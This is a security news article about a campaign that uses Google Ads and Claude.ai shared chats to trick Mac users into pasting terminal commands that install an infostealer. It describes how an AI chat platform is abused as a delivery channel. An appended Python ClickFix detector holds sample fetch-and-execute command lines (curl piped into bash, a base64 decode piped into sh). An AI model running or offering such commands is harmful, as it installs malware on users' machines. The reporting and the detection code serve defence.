Security researchers have uncovered an active malvertising campaign that weaponizes two trusted platforms — Google Ads and Anthropic's Claude.ai — to deliver macOS malware to unsuspecting users.
How the Attack Works
Users searching for terms like "Claude mac download" may encounter sponsored search results that appear to originate from claude.ai, because Google's ad labeling shows the legitimate domain as the destination. When clicked, however, victims are redirected to attacker-controlled pages or directly into a shared Claude.ai chat session that has been crafted to look like a legitimate download guide.
The malicious Claude.ai shared chats contain step-by-step instructions that guide users into running commands designed to install an infostealer on their Mac. By hosting the instruction content on Claude.ai's own domain, attackers gain a layer of legitimacy — browsers show claude.ai in the address bar, and many security tools treat the domain as trusted.
The Malware Payload
The campaign delivers a macOS-targeting infostealer capable of harvesting browser-stored credentials, cryptocurrency wallet files, session tokens, and system information. The malware is designed to operate quietly in the background after a one-time execution triggered by the social engineering lure.
This technique is a variation on the well-established ClickFix playbook, in which victims are convinced to paste malicious terminal commands as part of fake troubleshooting or installation steps. What is new here is that the Claude.ai platform — a legitimate AI assistant — becomes the unwitting delivery mechanism for those instructions.
Why This Campaign Is Notable
Several factors make this campaign particularly dangerous:
- Trusted domains as launchers: Claude.ai shared chats are public URLs on Anthropic's domain. Victims see no red flags from browser security indicators.
- Google Ads bypass: Sponsored results are often perceived as legitimate by users who don't scrutinize destination URLs carefully. Researchers noted that Google's ad labeling displayed the genuine claude.ai domain, making the deception harder to spot.
- macOS targeting: Mac users are often considered less security-conscious than their Windows counterparts and may be more likely to follow unfamiliar terminal instructions.
- AI brand trust: The growing mainstream adoption of AI tools means more users are actively seeking downloads and installation guides for AI assistants, making them natural targets.
Who Is Behind the Campaign
Attribution has not been publicly confirmed. The campaign's infrastructure and delivery methods share similarities with financially motivated threat actors who have previously abused Google Ads to push fake software installers — a category of attack that has grown sharply since 2024.
Mitigations
- Avoid clicking sponsored ads for software downloads; navigate directly to the vendor's official website.
- Verify URLs before following any download or installation instructions found in chat platforms, even seemingly legitimate AI services.
- Scrutinize terminal commands: Never paste commands from web pages or chat sessions into your Mac terminal without understanding what they do.
- Use an endpoint protection solution that monitors for suspicious process spawning or credential-harvesting behavior on macOS.
- Mac users should also consider enabling Gatekeeper and keeping it set to block software from unidentified developers.
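As an added defender-side example (not code from the article or from any vendor named in it), the following Python checks a few constructed macOS process-telemetry records for the ClickFix pattern described above: a download or decode stage whose output is piped straight into a shell spawned from a terminal app. The event shape, field names, process names and sample commands are assumptions made for illustration.

```python
import shlex

# Constructed sample events in the shape of a generic EDR process feed:
# parent application, child process name, and full command line.
# These records are made up for demonstration, not data from the campaign.
SAMPLE_EVENTS = [
    {"parent": "Terminal", "proc": "zsh", "cmd": "ls -la ~/Downloads"},
    {"parent": "Terminal", "proc": "bash",
     "cmd": "curl -fsSL https://example.invalid/setup.sh | bash"},
    {"parent": "Terminal", "proc": "zsh",
     "cmd": "echo aGVsbG8= | base64 -d | sh"},
    {"parent": "launchd", "proc": "softwareupdated", "cmd": "softwareupdated"},
]

TERMINAL_APPS = {"Terminal", "iTerm2"}       # assumed parent app names
INTERACTIVE_SHELLS = {"sh", "bash", "zsh"}
DOWNLOADERS = {"curl", "wget"}
DECODERS = {"base64", "xxd"}


def classify(event):
    """Return reasons an event looks like a pasted ClickFix command line,
    or an empty list when nothing in the pipeline looks suspicious."""
    if event["parent"] not in TERMINAL_APPS or event["proc"] not in INTERACTIVE_SHELLS:
        return []  # only shells a user is typing or pasting into
    try:
        tokens = shlex.split(event["cmd"])
    except ValueError:
        return ["unparseable command line"]
    # Split the token stream on '|' into pipeline stages, keep each head command.
    stages, current = [], []
    for tok in tokens:
        if tok == "|":
            stages.append(current)
            current = []
        else:
            current.append(tok)
    stages.append(current)
    heads = [s[0] for s in stages if s]
    reasons = []
    for i, head in enumerate(heads):
        if head in DOWNLOADERS | DECODERS and any(h in INTERACTIVE_SHELLS for h in heads[i + 1:]):
            reasons.append(f"{head} output piped into a shell")
            break
    return reasons


def scan(events):
    """Return (command line, reasons) for every flagged event."""
    return [(e["cmd"], classify(e)) for e in events if classify(e)]


if __name__ == "__main__":
    for cmd, why in scan(SAMPLE_EVENTS):
        print(f"FLAGGED: {cmd!r} -> {', '.join(why)}")
```

A real deployment would feed this from the EDR's process-creation stream and tune the process and app names to the environment.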
Anthropic has not yet issued a public statement on measures to prevent shared chats from being used in this way, though the company's trust and safety team is likely aware of the abuse vector given its public reporting.
Bottom Line: This campaign is a reminder that attackers adapt quickly to wherever user attention flows. The explosive growth of AI tool adoption has created a new and largely untested social engineering surface that threat actors are now actively probing.